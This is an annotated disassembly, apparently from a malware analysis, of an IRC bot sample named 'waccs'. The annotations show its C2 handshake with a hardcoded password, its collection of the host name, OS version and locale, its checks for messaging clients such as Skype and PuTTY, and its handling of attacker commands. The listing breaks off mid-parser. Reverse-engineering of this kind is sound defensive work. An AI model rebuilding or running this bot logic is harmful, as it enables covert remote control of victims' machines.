00401144  8BEC              MOV EBP,ESP
00401146  83EC 40           SUB ESP,40
00401149  8B45 08           MOV EAX,DWORD PTR SS:[EBP+8]
0040114C  0FBE80 88000000   MOVSX EAX,BYTE PTR DS:[EAX+88]
00401153  85C0              TEST EAX,EAX
00401155  74 44             JE SHORT waccs.0040119B
00401157  8B45 08           MOV EAX,DWORD PTR SS:[EBP+8]
0040115A  05 88000000       ADD EAX,88
0040115F  50                PUSH EAX
00401160  68 175FE19B       PUSH 9BE15F17
00401165  8D4D D4           LEA ECX,DWORD PTR SS:[EBP-2C]
00401168  E8 69100000       CALL waccs.004021D6                       ; ASCII "PASS %s"
0040116D  50                PUSH EAX
0040116E  FF75 08           PUSH DWORD PTR SS:[EBP+8]
00401171  E8 8AFEFFFF       CALL waccs.00401000                       ; Build and send a packet (format: PASS %s).
00401176  83C4 0C           ADD ESP,0C
00401179  0FB6C0            MOVZX EAX,AL
0040117C  F7D8              NEG EAX
0040117E  1BC0              SBB EAX,EAX
00401180  40                INC EAX
00401181  8845 DC           MOV BYTE PTR SS:[EBP-24],AL
00401184  8D4D D4           LEA ECX,DWORD PTR SS:[EBP-2C]
00401187  E8 4A0E0000       CALL waccs.00401FD6                       ; Clear memory data.
0040118C  0FB645 DC         MOVZX EAX,BYTE PTR SS:[EBP-24]
00401190  85C0              TEST EAX,EAX
00401192  74 07             JE SHORT waccs.0040119B
00401194  32C0              XOR AL,AL
00401196  E9 8D000000       JMP waccs.00401228                        ; If sending the packet failed, exit (return).
0040119B  FF75 08           PUSH DWORD PTR SS:[EBP+8]
0040119E  E8 87000000       CALL waccs.0040122A                       ; Check whether certain messaging tools are running, then build and send a packet (format: NICK %s).
004011A3  59                POP ECX
004011A4  6A 11             PUSH 11
004011A6  6A 00             PUSH 0
004011A8  8D45 E0           LEA EAX,DWORD PTR SS:[EBP-20]
004011AB  50                PUSH EAX
004011AC  E8 895E0000       CALL waccs.0040703A                       ; JMP to msvcrt.memset
004011B1  83C4 0C           ADD ESP,0C
004011B4  6A 08             PUSH 8
004011B6  6A 00             PUSH 0
004011B8  8D45 F8           LEA EAX,DWORD PTR SS:[EBP-8]
004011BB  50                PUSH EAX
004011BC  E8 795E0000       CALL waccs.0040703A                       ; JMP to msvcrt.memset
004011C1  83C4 0C           ADD ESP,0C
004011C4  C745 F4 1000000>  MOV DWORD PTR SS:[EBP-C],10
004011CB  8D45 F4           LEA EAX,DWORD PTR SS:[EBP-C]
004011CE  50                PUSH EAX
004011CF  8D45 E0           LEA EAX,DWORD PTR SS:[EBP-20]
004011D2  50                PUSH EAX
004011D3  FF15 60804000     CALL DWORD PTR DS:[408060]                ; kernel32.GetComputerNameA (get the computer name).
004011D9  6A 08             PUSH 8
004011DB  8D45 F8           LEA EAX,DWORD PTR SS:[EBP-8]
004011DE  50                PUSH EAX
004011DF  E8 972A0000       CALL waccs.00403C7B                       ; Get the OS version string "%s-SP%d".
004011E4  59                POP ECX
004011E5  59                POP ECX
004011E6  8D45 E0           LEA EAX,DWORD PTR SS:[EBP-20]
004011E9  50                PUSH EAX
004011EA  8D45 F8           LEA EAX,DWORD PTR SS:[EBP-8]
004011ED  50                PUSH EAX
004011EE  68 D1F1AD0C       PUSH 0CADF1D1
004011F3  8D4D C0           LEA ECX,DWORD PTR SS:[EBP-40]
004011F6  E8 3B100000       CALL waccs.00402236                       ; ASCII "USER %s x x :%s"
004011FB  50                PUSH EAX
004011FC  FF75 08           PUSH DWORD PTR SS:[EBP+8]
004011FF  E8 FCFDFFFF       CALL waccs.00401000                       ; Build and send a packet (format: USER %s x x :%s).
00401204  83C4 10           ADD ESP,10
00401207  0FB6C0            MOVZX EAX,AL
0040120A  F7D8              NEG EAX
0040120C  1BC0              SBB EAX,EAX
0040120E  40                INC EAX
0040120F  8845 D0           MOV BYTE PTR SS:[EBP-30],AL
00401212  8D4D C0           LEA ECX,DWORD PTR SS:[EBP-40]
00401215  E8 1C0D0000       CALL waccs.00401F36                       ; Clear memory data.
0040121A  0FB645 D0         MOVZX EAX,BYTE PTR SS:[EBP-30]
0040121E  85C0              TEST EAX,EAX
00401220  74 04             JE SHORT waccs.00401226
00401222  32C0              XOR AL,AL
00401224  EB 02             JMP SHORT waccs.00401228
00401226  B0 01             MOV AL,1
00401228  C9                LEAVE
00401229  C3                RETN                                      ; Return.

Build and send a packet (format: PASS %s):

00401000  55                PUSH EBP
00401001  8BEC              MOV EBP,ESP
00401003  81EC 08040000     SUB ESP,408
00401009  68 00040000       PUSH 400
0040100E  6A 00             PUSH 0
00401010  8D85 00FCFFFF     LEA EAX,DWORD PTR SS:[EBP-400]
00401016  50                PUSH EAX
00401017  E8 1E600000       CALL waccs.0040703A                       ; JMP to msvcrt.memset
0040101C  83C4 0C           ADD ESP,0C
0040101F  8D45 10           LEA EAX,DWORD PTR SS:[EBP+10]
00401022  8985 FCFBFFFF     MOV DWORD PTR SS:[EBP-404],EAX
00401028  FFB5 FCFBFFFF     PUSH DWORD PTR SS:[EBP-404]               ; /arglist = 0012F784
0040102E  FF75 0C           PUSH DWORD PTR SS:[EBP+C]                 ; |format = "PASS %s"
00401031  68 00040000       PUSH 400                                  ; |count = 400 (1024.)
00401036  8D85 00FCFFFF     LEA EAX,DWORD PTR SS:[EBP-400]
0040103C  50                PUSH EAX                                  ; |buffer = 0012F374
0040103D  E8 F25F0000       CALL waccs.00407034                       ; JMP to msvcrt._vsnprintf
00401042  83C4 10           ADD ESP,10
00401045  83A5 FCFBFFFF 0>  AND DWORD PTR SS:[EBP-404],0
0040104C  68 00040000       PUSH 400                                  ; /maxlen = 400 (1024.)
00401051  68 246752BF       PUSH BF526724
00401056  8D8D F8FBFFFF     LEA ECX,DWORD PTR SS:[EBP-408]
0040105C  E8 B5100000       CALL waccs.00402116                       ; ASCII "\n"
00401061  50                PUSH EAX                                  ; |src = "\n"
00401062  8D85 00FCFFFF     LEA EAX,DWORD PTR SS:[EBP-400]
00401068  50                PUSH EAX                                  ; |dest = "PASS su1c1d3"
00401069  E8 C05F0000       CALL waccs.0040702E                       ; JMP to msvcrt.strncat
0040106E  83C4 0C           ADD ESP,0C
00401071  8D8D F8FBFFFF     LEA ECX,DWORD PTR SS:[EBP-408]
00401077  E8 820F0000       CALL waccs.00401FFE                       ; Clear memory data.
0040107C  6A 00             PUSH 0                                    ; /Flags = 0
0040107E  8D85 00FCFFFF     LEA EAX,DWORD PTR SS:[EBP-400]
00401084  50                PUSH EAX                                  ; /s = "PASS su1c1d3\n"
00401085  E8 9E5F0000       CALL waccs.00407028                       ; JMP to msvcrt.strlen
0040108A  59                POP ECX
0040108B  50                PUSH EAX                                  ; |DataSize = E (14.)
0040108C  8D85 00FCFFFF     LEA EAX,DWORD PTR SS:[EBP-400]
00401092  50                PUSH EAX                                  ; |Data = 0012F374
00401093  8B45 08           MOV EAX,DWORD PTR SS:[EBP+8]
00401096  FF30              PUSH DWORD PTR DS:[EAX]                   ; |Socket = B4
00401098  FF15 C4814000     CALL DWORD PTR DS:[4081C4]                ; WS2_32.send
0040109E  85C0              TEST EAX,EAX
004010A0  7E 04             JLE SHORT waccs.004010A6
004010A2  B0 01             MOV AL,1
004010A4  EB 02             JMP SHORT waccs.004010A8
004010A6  32C0              XOR AL,AL
004010A8  C9                LEAVE
004010A9  C3                RETN                                      ; Return.

Check whether certain messaging tools are running on the system, then build and send a packet (format: NICK %s):

0040122A  55                PUSH EBP
0040122B  8BEC              MOV EBP,ESP
0040122D  81EC 08010000     SUB ESP,108
00401233  56                PUSH ESI
00401234  57                PUSH EDI
00401235  6A 09             PUSH 9
00401237  59                POP ECX
00401238  BE 30904000       MOV ESI,waccs.00409030                    ; ASCII "abcdefghijklmnopqrstuvwxyz1234567890"
0040123D  8D7D B4           LEA EDI,DWORD PTR SS:[EBP-4C]
00401240  F3:A5             REP MOVS DWORD PTR ES:[EDI],DWORD PTR DS>
00401242  A4                MOVS BYTE PTR ES:[EDI],BYTE PTR DS:[ESI]
00401243  6A 04             PUSH 4
00401245  6A 00             PUSH 0
00401247  8D45 FC           LEA EAX,DWORD PTR SS:[EBP-4]
0040124A  50                PUSH EAX
0040124B  E8 EA5D0000       CALL waccs.0040703A                       ; JMP to msvcrt.memset
00401250  83C4 0C           ADD ESP,0C
00401253  6A 19             PUSH 19
00401255  6A 00             PUSH 0
00401257  8D45 E0           LEA EAX,DWORD PTR SS:[EBP-20]
0040125A  50                PUSH EAX
0040125B  E8 DA5D0000       CALL waccs.0040703A                       ; JMP to msvcrt.memset
00401260  83C4 0C           ADD ESP,0C
00401263  FF15 68804000     CALL DWORD PTR DS:[408068]                ; kernel32.GetTickCount
00401269  50                PUSH EAX
0040126A  E8 DD5D0000       CALL waccs.0040704C                       ; JMP to msvcrt.srand (seed the random number generator).
0040126F  59                POP ECX
00401270  8365 DC 00        AND DWORD PTR SS:[EBP-24],0
00401274  EB 07             JMP SHORT waccs.0040127D
00401276  8B45 DC           MOV EAX,DWORD PTR SS:[EBP-24]
00401279  40                INC EAX
0040127A  8945 DC           MOV DWORD PTR SS:[EBP-24],EAX
0040127D  837D DC 0A        CMP DWORD PTR SS:[EBP-24],0A
00401281  73 19             JNB SHORT waccs.0040129C                  ; Generate a 10-character random string.
00401283  E8 BE5D0000       CALL waccs.00407046                       ; JMP to msvcrt.rand (generate a random number).
00401288  33D2              XOR EDX,EDX
0040128A  6A 24             PUSH 24
0040128C  59                POP ECX
0040128D  F7F1              DIV ECX
0040128F  8B45 DC           MOV EAX,DWORD PTR SS:[EBP-24]
00401292  8A4C15 B4         MOV CL,BYTE PTR SS:[EBP+EDX-4C]
00401296  884C05 E0         MOV BYTE PTR SS:[EBP+EAX-20],CL
0040129A  ^ EB DA           JMP SHORT waccs.00401276
0040129C  6A 04             PUSH 4                                    ; /BufSize = 4
0040129E  8D45 FC           LEA EAX,DWORD PTR SS:[EBP-4]
004012A1  50                PUSH EAX                                  ; |Buffer = 0012F778
004012A2  6A 07             PUSH 7                                    ; |InfoType = 7
004012A4  68 00080000       PUSH 800                                  ; |LocaleId = 800
004012A9  FF15 64804000     CALL DWORD PTR DS:[408064]                ; kernel32.GetLocaleInfoA (get the locale setting).
004012AF  6A 00             PUSH 0
004012B1  68 52362A35       PUSH 352A3652
004012B6  8D4D 98           LEA ECX,DWORD PTR SS:[EBP-68]
004012B9  E8 78120000       CALL waccs.00402536                       ; ASCII "tSkMainForm.UnicodeClass"
004012BE  50                PUSH EAX                                  ; Class = "tSkMainForm.UnicodeClass"
004012BF  FF15 88814000     CALL DWORD PTR DS:[408188]                ; USER32.FindWindowA
004012C5  85C0              TEST EAX,EAX
004012C7  74 0C             JE SHORT waccs.004012D5
004012C9  C785 10FFFFFF 7>  MOV DWORD PTR SS:[EBP-F0],waccs.00409074
004012D3  EB 0A             JMP SHORT waccs.004012DF
004012D5  C785 10FFFFFF B>  MOV DWORD PTR SS:[EBP-F0],waccs.0040A0B8
004012DF  6A 00             PUSH 0
004012E1  68 63E1E390       PUSH 90E3E163
004012E6  8D4D 90           LEA ECX,DWORD PTR SS:[EBP-70]
004012E9  E8 E8110000       CALL waccs.004024D6                       ; ASCII "PuTTY"
004012EE  50                PUSH EAX
004012EF  FF15 88814000     CALL DWORD PTR DS:[408188]                ; USER32.FindWindowA
004012F5  85C0              TEST EAX,EAX
004012F7  74 0C             JE SHORT waccs.00401305
004012F9  C785 0CFFFFFF 8>  MOV DWORD PTR SS:[EBP-F4],waccs.00409080
00401303  EB 0A             JMP SHORT waccs.0040130F
00401305  C785 0CFFFFFF B>  MOV DWORD PTR SS:[EBP-F4],waccs.0040A0BC
0040130F  6A 00             PUSH 0
00401311  68 698783CA       PUSH CA838769
00401316  8D4D 84           LEA ECX,DWORD PTR SS:[EBP-7C]
00401319  E8 58110000       CALL waccs.00402476
0040131E  50                PUSH EAX                                  ; ASCII "TFrmMain"
0040131F  FF15 88814000     CALL DWORD PTR DS:[408188]                ; USER32.FindWindowA
00401325  85C0              TEST EAX,EAX
00401327  74 0C             JE SHORT waccs.00401335
00401329  C785 08FFFFFF 9>  MOV DWORD PTR SS:[EBP-F8],waccs.00409090
00401333  EB 0A             JMP SHORT waccs.0040133F
00401335  C785 08FFFFFF C>  MOV DWORD PTR SS:[EBP-F8],waccs.0040A0C0
0040133F  6A 00             PUSH 0
00401341  68 D452AC45       PUSH 45AC52D4
00401346  8D8D 74FFFFFF     LEA ECX,DWORD PTR SS:[EBP-8C]
0040134C  E8 C5100000       CALL waccs.00402416
00401351  50                PUSH EAX                                  ; ASCII "YahooBuddyMain"
00401352  FF15 88814000     CALL DWORD PTR DS:[408188]                ; USER32.FindWindowA
00401358  85C0              TEST EAX,EAX
0040135A  74 0C             JE SHORT waccs.00401368
0040135C  C785 04FFFFFF A>  MOV DWORD PTR SS:[EBP-FC],waccs.004090A4
00401366  EB 0A             JMP SHORT waccs.00401372
00401368  C785 04FFFFFF C>  MOV DWORD PTR SS:[EBP-FC],waccs.0040A0C4
00401372  6A 00             PUSH 0
00401374  68 ED96D04C       PUSH 4CD096ED
00401379  8D8D 64FFFFFF     LEA ECX,DWORD PTR SS:[EBP-9C]
0040137F  E8 32100000       CALL waccs.004023B6
00401384  50                PUSH EAX                                  ; ASCII "MSBLWindowClass"
00401385  FF15 88814000     CALL DWORD PTR DS:[408188]                ; USER32.FindWindowA
0040138B  85C0              TEST EAX,EAX
0040138D  74 0C             JE SHORT waccs.0040139B
0040138F  C785 00FFFFFF B>  MOV DWORD PTR SS:[EBP-100],waccs.004090B>
00401399  EB 0A             JMP SHORT waccs.004013A5
0040139B  C785 00FFFFFF C>  MOV DWORD PTR SS:[EBP-100],waccs.0040A0C>
004013A5  6A 00             PUSH 0
004013A7  68 64E255AD       PUSH AD55E264
004013AC  8D8D 50FFFFFF     LEA ECX,DWORD PTR SS:[EBP-B0]
004013B2  E8 9F0F0000       CALL waccs.00402356
004013B7  50                PUSH EAX                                  ; ASCII "_Oscar_StatusNotify"
004013B8  FF15 88814000     CALL DWORD PTR DS:[408188]                ; USER32.FindWindowA
004013BE  85C0              TEST EAX,EAX
004013C0  74 0C             JE SHORT waccs.004013CE
004013C2  C785 FCFEFFFF D>  MOV DWORD PTR SS:[EBP-104],waccs.004090D>
004013CC  EB 0A             JMP SHORT waccs.004013D8
004013CE  C785 FCFEFFFF C>  MOV DWORD PTR SS:[EBP-104],waccs.0040A0C>
004013D8  6A 00             PUSH 0
004013DA  68 B7B86706       PUSH 667B8B7
004013DF  8D8D 3CFFFFFF     LEA ECX,DWORD PTR SS:[EBP-C4]
004013E5  E8 0C0F0000       CALL waccs.004022F6
004013EA  50                PUSH EAX                                  ; ASCII "__oxFrame.class__"
004013EB  FF15 88814000     CALL DWORD PTR DS:[408188]                ; USER32.FindWindowA
004013F1  85C0              TEST EAX,EAX
004013F3  74 0C             JE SHORT waccs.00401401
004013F5  C785 F8FEFFFF E>  MOV DWORD PTR SS:[EBP-108],waccs.004090E>
004013FF  EB 0A             JMP SHORT waccs.0040140B
00401401  C785 F8FEFFFF D>  MOV DWORD PTR SS:[EBP-108],waccs.0040A0D>
0040140B  8D45 E0           LEA EAX,DWORD PTR SS:[EBP-20]
0040140E  50                PUSH EAX
0040140F  8D45 FC           LEA EAX,DWORD PTR SS:[EBP-4]
00401412  50                PUSH EAX
00401413  FFB5 10FFFFFF     PUSH DWORD PTR SS:[EBP-F0]
00401419  FFB5 0CFFFFFF     PUSH DWORD PTR SS:[EBP-F4]
0040141F  FFB5 08FFFFFF     PUSH DWORD PTR SS:[EBP-F8]
00401425  FFB5 04FFFFFF     PUSH DWORD PTR SS:[EBP-FC]
0040142B  FFB5 00FFFFFF     PUSH DWORD PTR SS:[EBP-100]
00401431  FFB5 FCFEFFFF     PUSH DWORD PTR SS:[EBP-104]
00401437  FFB5 F8FEFFFF     PUSH DWORD PTR SS:[EBP-108]
0040143D  E8 6D270000       CALL waccs.00403BAF                       ; Arrange the data.
00401442  50                PUSH EAX
00401443  68 D82E8AAE       PUSH AE8A2ED8
00401448  8D8D 20FFFFFF     LEA ECX,DWORD PTR SS:[EBP-E0]
0040144E  E8 430E0000       CALL waccs.00402296                       ; ASCII "\%0.2u%s%s%s%s%s%s%s\%3s\%s"
00401453  50                PUSH EAX
00401454  6A 1E             PUSH 1E
00401456  8B45 08           MOV EAX,DWORD PTR SS:[EBP+8]
00401459  05 EC000000       ADD EAX,0EC
0040145E  50                PUSH EAX
0040145F  E8 DC5B0000       CALL waccs.00407040                       ; JMP to msvcrt._snprintf (ASCII "\00F\CHN\zsocxb7vm9").
00401464  83C4 34           ADD ESP,34
00401467  8D8D 20FFFFFF     LEA ECX,DWORD PTR SS:[EBP-E0]
0040146D  E8 4C0A0000       CALL waccs.00401EBE                       ; Clear memory data.
00401472  8D8D 3CFFFFFF     LEA ECX,DWORD PTR SS:[EBP-C4]
00401478  E8 690A0000       CALL waccs.00401EE6                       ; Clear memory data.
0040147D  8D8D 50FFFFFF     LEA ECX,DWORD PTR SS:[EBP-B0]
00401483  E8 860A0000       CALL waccs.00401F0E                       ; Clear memory data.
00401488  8D8D 64FFFFFF     LEA ECX,DWORD PTR SS:[EBP-9C]
0040148E  E8 A30A0000       CALL waccs.00401F36                       ; Clear memory data.
00401493  8D8D 74FFFFFF     LEA ECX,DWORD PTR SS:[EBP-8C]
00401499  E8 C00A0000       CALL waccs.00401F5E                       ; Clear memory data.
0040149E  8D4D 84           LEA ECX,DWORD PTR SS:[EBP-7C]
004014A1  E8 200C0000       CALL waccs.004020C6                       ; Clear memory data.
004014A6  8D4D 90           LEA ECX,DWORD PTR SS:[EBP-70]
004014A9  E8 D80A0000       CALL waccs.00401F86                       ; Clear memory data.
004014AE  8D4D 98           LEA ECX,DWORD PTR SS:[EBP-68]
004014B1  E8 F80A0000       CALL waccs.00401FAE                       ; Clear memory data.
004014B6  8B45 08           MOV EAX,DWORD PTR SS:[EBP+8]
004014B9  05 EC000000       ADD EAX,0EC
004014BE  50                PUSH EAX
004014BF  68 2B298D3A       PUSH 3A8D292B
004014C4  8D8D 14FFFFFF     LEA ECX,DWORD PTR SS:[EBP-EC]
004014CA  E8 C7100000       CALL waccs.00402596                       ; ASCII "NICK %s"
004014CF  50                PUSH EAX
004014D0  FF75 08           PUSH DWORD PTR SS:[EBP+8]
004014D3  E8 28FBFFFF       CALL waccs.00401000                       ; Build and send a packet (format: NICK %s).
004014D8  83C4 0C           ADD ESP,0C
004014DB  0FB6C0            MOVZX EAX,AL
004014DE  F7D8              NEG EAX
004014E0  1BC0              SBB EAX,EAX
004014E2  40                INC EAX
004014E3  8885 1CFFFFFF     MOV BYTE PTR SS:[EBP-E4],AL
004014E9  8D8D 14FFFFFF     LEA ECX,DWORD PTR SS:[EBP-EC]
004014EF  E8 E20A0000       CALL waccs.00401FD6                       ; Clear memory data.
004014F4  0FB685 1CFFFFFF   MOVZX EAX,BYTE PTR SS:[EBP-E4]
004014FB  85C0              TEST EAX,EAX
004014FD  74 04             JE SHORT waccs.00401503
004014FF  32C0              XOR AL,AL
00401501  EB 02             JMP SHORT waccs.00401505
00401503  B0 01             MOV AL,1
00401505  5F                POP EDI
00401506  5E                POP ESI
00401507  C9                LEAVE
00401508  C3                RETN                                      ; Return.

Receive the packets returned by the attacker's server and perform the corresponding malicious action according to the attacker-defined "command" in each packet:

00401509  55                PUSH EBP
0040150A  8BEC              MOV EBP,ESP
0040150C  B8 14100000       MOV EAX,1014
00401511  E8 4A5B0000       CALL waccs.00407060                       ; Initialize the memory area to empty.
00401516  8D85 00F0FFFF     LEA EAX,DWORD PTR SS:[EBP-1000]
0040151C  8985 FCEFFFFF     MOV DWORD PTR SS:[EBP-1004],EAX
00401522  68 00100000       PUSH 1000
00401527  6A 00             PUSH 0
00401529  8D85 00F0FFFF     LEA EAX,DWORD PTR SS:[EBP-1000]
0040152F  50                PUSH EAX
00401530  E8 055B0000       CALL waccs.0040703A                       ; JMP to msvcrt.memset
00401535  83C4 0C           ADD ESP,0C
00401538  6A 00             PUSH 0                                    ; /Flags = 0
0040153A  68 00100000       PUSH 1000                                 ; |BufSize = 1000 (4096.)
0040153F  8D85 00F0FFFF     LEA EAX,DWORD PTR SS:[EBP-1000]
00401545  50                PUSH EAX                                  ; |Buffer = 0012E7C8
00401546  8B45 08           MOV EAX,DWORD PTR SS:[EBP+8]
00401549  FF30              PUSH DWORD PTR DS:[EAX]                   ; |Socket = CC
0040154B  FF15 E4814000     CALL DWORD PTR DS:[4081E4]                ; WS2_32.recv (receive the command packet returned by the attacker's remote server).
00401551  8985 F4EFFFFF     MOV DWORD PTR SS:[EBP-100C],EAX
00401557  83BD F4EFFFFF 0>  CMP DWORD PTR SS:[EBP-100C],0
0040155E  74 09             JE SHORT waccs.00401569
00401560  83BD F4EFFFFF F>  CMP DWORD PTR SS:[EBP-100C],-1
00401567  75 0F             JNZ SHORT waccs.00401578
00401569  8B45 08           MOV EAX,DWORD PTR SS:[EBP+8]
0040156C  FF30              PUSH DWORD PTR DS:[EAX]
0040156E  FF15 C8814000     CALL DWORD PTR DS:[4081C8]                ; WS2_32.closesocket (close the connection).
00401574  32C0              XOR AL,AL
00401576  EB 6F             JMP SHORT waccs.004015E7
00401578  68 44F2FD81       PUSH 81FDF244
0040157D  8D8D ECEFFFFF     LEA ECX,DWORD PTR SS:[EBP-1014]
00401583  E8 6E100000       CALL waccs.004025F6                       ; ASCII "\n"
00401588  50                PUSH EAX
00401589  FFB5 FCEFFFFF     PUSH DWORD PTR SS:[EBP-1004]
0040158F  E8 BE5A0000       CALL waccs.00407052                       ; JMP to msvcrt.strstr
00401594  59                POP ECX
00401595  59                POP ECX
00401596  8985 F8EFFFFF     MOV DWORD PTR SS:[EBP-1008],EAX
0040159C  8B85 F8EFFFFF     MOV EAX,DWORD PTR SS:[EBP-1008]
004015A2  8985 F0EFFFFF     MOV DWORD PTR SS:[EBP-1010],EAX
004015A8  8D8D ECEFFFFF     LEA ECX,DWORD PTR SS:[EBP-1014]
004015AE  E8 4B0A0000       CALL waccs.00401FFE                       ; Clear memory data.
004015B3  83BD F0EFFFFF 0>  CMP DWORD PTR SS:[EBP-1010],0
004015BA  74 29             JE SHORT waccs.004015E5
004015BC  8B85 F8EFFFFF     MOV EAX,DWORD PTR SS:[EBP-1008]
004015C2  8020 00           AND BYTE PTR DS:[EAX],0
004015C5  FFB5 FCEFFFFF     PUSH DWORD PTR SS:[EBP-1004]
004015CB  FF75 08           PUSH DWORD PTR SS:[EBP+8]
004015CE  E8 16000000       CALL waccs.004015E9                       ; Parse the packet returned by the attacker's server and perform the corresponding malicious action according to the attacker-defined "command" in it.
004015D3  59                POP ECX
004015D4  59                POP ECX
004015D5  8B85 F8EFFFFF     MOV EAX,DWORD PTR SS:[EBP-1008]
004015DB  40                INC EAX
004015DC  40                INC EAX
004015DD  8985 FCEFFFFF     MOV DWORD PTR SS:[EBP-1004],EAX
004015E3  ^ EB 93           JMP SHORT waccs.00401578
004015E5  B0 01             MOV AL,1
004015E7  C9                LEAVE
004015E8  C3                RETN                                      ; Return.

Parse the packet returned by the attacker's server and perform the corresponding malicious action according to the attacker-defined "command" in it (the code inside this function is rather tedious, so some annotations have been omitted):

004015E9  55                PUSH EBP
004015EA  8BEC              MOV EBP,ESP
004015EC  81EC B40B0000     SUB ESP,0BB4
004015F2  57                PUSH EDI
004015F3  83A5 64FEFFFF 0>  AND DWORD PTR SS:[EBP-19C],0
004015FA  6A 63             PUSH 63
004015FC  59                POP ECX
004015FD  33C0              XOR EAX,EAX
004015FF  8DBD 68FEFFFF     LEA EDI,DWORD PTR SS:[EBP-198]
00401605  F3:AB             REP STOS DWORD PTR ES:[EDI]
00401607  8365 F4 00        AND DWORD PTR SS:[EBP-C],0
0040160B  68 14914000       PUSH waccs.00409114
00401610  FF75 0C           PUSH DWORD PTR SS:[EBP+C]
00401613  E8 3A5A0000       CALL waccs.00407052                       ; JMP to msvcrt.strstr
00401618  59                POP ECX
00401619  59                POP ECX
0040161A  8945 F8           MOV DWORD PTR SS:[EBP-8],EAX
0040161D  837D F8 00        CMP DWORD PTR SS:[EBP-8],0
00401621  74 23             JE SHORT waccs.00401646
00401623  8B45 F8           MOV EAX,DWORD PTR SS:[EBP-8]
00401626  8020 00           AND BYTE PTR DS:[EAX],0
00401629  8B45 F4           MOV EAX,DWORD PTR SS:[EBP-C]
0040162C  8B4D 0C           MOV ECX,DWORD PTR SS:[EBP+C]
0040162F  898C85 64FEFFFF   MOV DWORD PTR SS:[EBP+EAX*4-19C],ECX
00401636  8B45 F8           MOV EAX,DWORD PTR SS:[EBP-8]
00401639  40                INC EAX
0040163A  8945 0C           MOV DWORD PTR SS:[EBP+C],EAX
0040163D  8B45 F4           MOV EAX,DWORD PTR SS:[EBP-C]
00401640  40                INC EAX
00401641  8945 F4           MOV DWORD PTR SS:[EBP-C],EAX
00401644  ^ EB C5           JMP SHORT waccs.0040160B
00401646  8B45 F4           MOV EAX,DWORD PTR SS:[EBP-C]
00401649  8B4D 0C           MOV ECX,DWORD PTR SS:[EBP+C]
0040164C  898C85 64FEFFFF   MOV DWORD PTR SS:[EBP+EAX*4-19C],ECX
00401653  C745 FC 0400000>  MOV DWORD PTR SS:[EBP-4],4
0040165A  83BD 64FEFFFF 0>  CMP DWORD PTR SS:[EBP-19C],0
00401661  74 09             JE SHORT waccs.0040166C
00401663  83BD 68FEFFFF 0>  CMP DWORD PTR SS:[EBP-198],0
0040166A  75 05             JNZ SHORT waccs.00401671
0040166C  E9 22080000       JMP waccs.00401E93
00401671  FFB5 64FEFFFF     PUSH DWORD PTR SS:[EBP-19C]
00401677  68 5D2573B7       PUSH B773255D
0040167C  8D8D 00F5FFFF     LEA ECX,DWORD PTR SS:[EBP-B00]
00401682  E8 CF0F0000       CALL waccs.00402656                       ; ASCII "PING"
00401687  50                PUSH EAX
00401688  E8 155A0000       CALL waccs.004070A2                       ; JMP to msvcrt.strcmp (check whether the command is "PING").
0040168D  59                POP ECX
0040168E  59                POP ECX
0040168F  F7D8              NEG EAX
00401691  1BC0              SBB EAX,EAX
00401693  40                INC EAX
00401694  8885 08F5FFFF     MOV BYTE PTR SS:[EBP-AF8],AL
0040169A  8D8D 00F5FFFF     LEA ECX,DWORD PTR SS:[EBP-B00]
004016A0  E8 81090000       CALL waccs.00402026                       ; Clear memory data.
004016A5  0FB685 08F5FFFF   MOVZX EAX,BYTE PTR SS:[EBP-AF8]
004016AC  85C0              TEST EAX,EAX
004016AE  74 3F             JE SHORT waccs.004016EF                   ; Decide whether the "PING" command should be handled.
004016B0  8B45 08           MOV EAX,DWORD PTR SS:[EBP+8]
004016B3  05 BA000000       ADD EAX,0BA
004016B8  50                PUSH EAX
004016B9  8B45 08           MOV EAX,DWORD PTR SS:[EBP+8]
004016BC  05 A1000000       ADD EAX,0A1
004016C1  50                PUSH EAX
004016C2  FFB5 68FEFFFF     PUSH DWORD PTR SS:[EBP-198]
004016C8  68 5BF5ABE4       PUSH E4ABF55B
004016CD  8D8D F8F4FFFF     LEA ECX,DWORD PTR SS:[EBP-B08]
004016D3  E8 DE0F0000       CALL waccs.004026B6                       ; ASCII "PONG %s"
004016D8  50                PUSH EAX
004016D9  FF75 08           PUSH DWORD PTR SS:[EBP+8]
004016DC  E8 1FF9FFFF       CALL waccs.00401000                       ; Build and send a packet (format: "PONG %s").
004016E1  83C4 14           ADD ESP,14
004016E4  8D8D F8F4FFFF     LEA ECX,DWORD PTR SS:[EBP-B08]
004016EA  E8 E7080000       CALL waccs.00401FD6                       ; Clear memory data.
004016EF  FFB5 68FEFFFF     PUSH DWORD PTR SS:[EBP-198]
004016F5  68 1B2CF4BE       PUSH BEF42C1B
004016FA  8D8D F0F4FFFF     LEA ECX,DWORD PTR SS:[EBP-B10]
00401700  E8 11100000       CALL waccs.00402716                       ; ASCII "001"
00401705  50                PUSH EAX
00401706  E8 97590000       CALL waccs.004070A2                       ; JMP to msvcrt.strcmp (check whether the command is "001").
0040170B  59                POP ECX
0040170C  59                POP ECX
0040170D  F7D8              NEG EAX
0040170F  1BC0              SBB EAX,EAX
00401711  40                INC EAX
00401712  8885 F4F4FFFF     MOV BYTE PTR SS:[EBP-B0C],AL
00401718  8D8D F0F4FFFF     LEA ECX,DWORD PTR SS:[EBP-B10]
0040171E  E8 2B090000       CALL waccs.0040204E                       ; Clear memory data.
00401723  0FB685 F4F4FFFF   MOVZX EAX,BYTE PTR SS:[EBP-B0C]
0040172A  85C0              TEST EAX,EAX
0040172C  74 39             JE SHORT waccs.00401767                   ; Decide whether the "001" command should be handled.
0040172E  8B45 08           MOV EAX,DWORD PTR SS:[EBP+8]
00401731  05 BA000000       ADD EAX,0BA
00401736  50                PUSH EAX
00401737  8B45 08           MOV EAX,DWORD PTR SS:[EBP+8]
0040173A  05 A1000000       ADD EAX,0A1
0040173F  50                PUSH EAX
00401740  68 CCADB02E       PUSH 2EB0ADCC
00401745  8D8D E4F4FFFF     LEA ECX,DWORD PTR SS:[EBP-B1C]
0040174B  E8 26100000       CALL waccs.00402776                       ; ASCII "JOIN %s %s"
00401750  50                PUSH EAX
00401751  FF75 08           PUSH DWORD PTR SS:[EBP+8]
00401754  E8 A7F8FFFF       CALL waccs.00401000                       ; Build and send a packet (format: "JOIN %s %s").
00401759  83C4 10           ADD ESP,10
0040175C  8D8D E4F4FFFF     LEA ECX,DWORD PTR SS:[EBP-B1C]
00401762  E8 0F090000       CALL waccs.00402076                       ; Clear memory data.
00401767  FFB5 68FEFFFF     PUSH DWORD PTR SS:[EBP-198]
0040176D  68 3B99B737       PUSH 37B7993B
00401772  8D8D D8F4FFFF     LEA ECX,DWORD PTR SS:[EBP-B28]
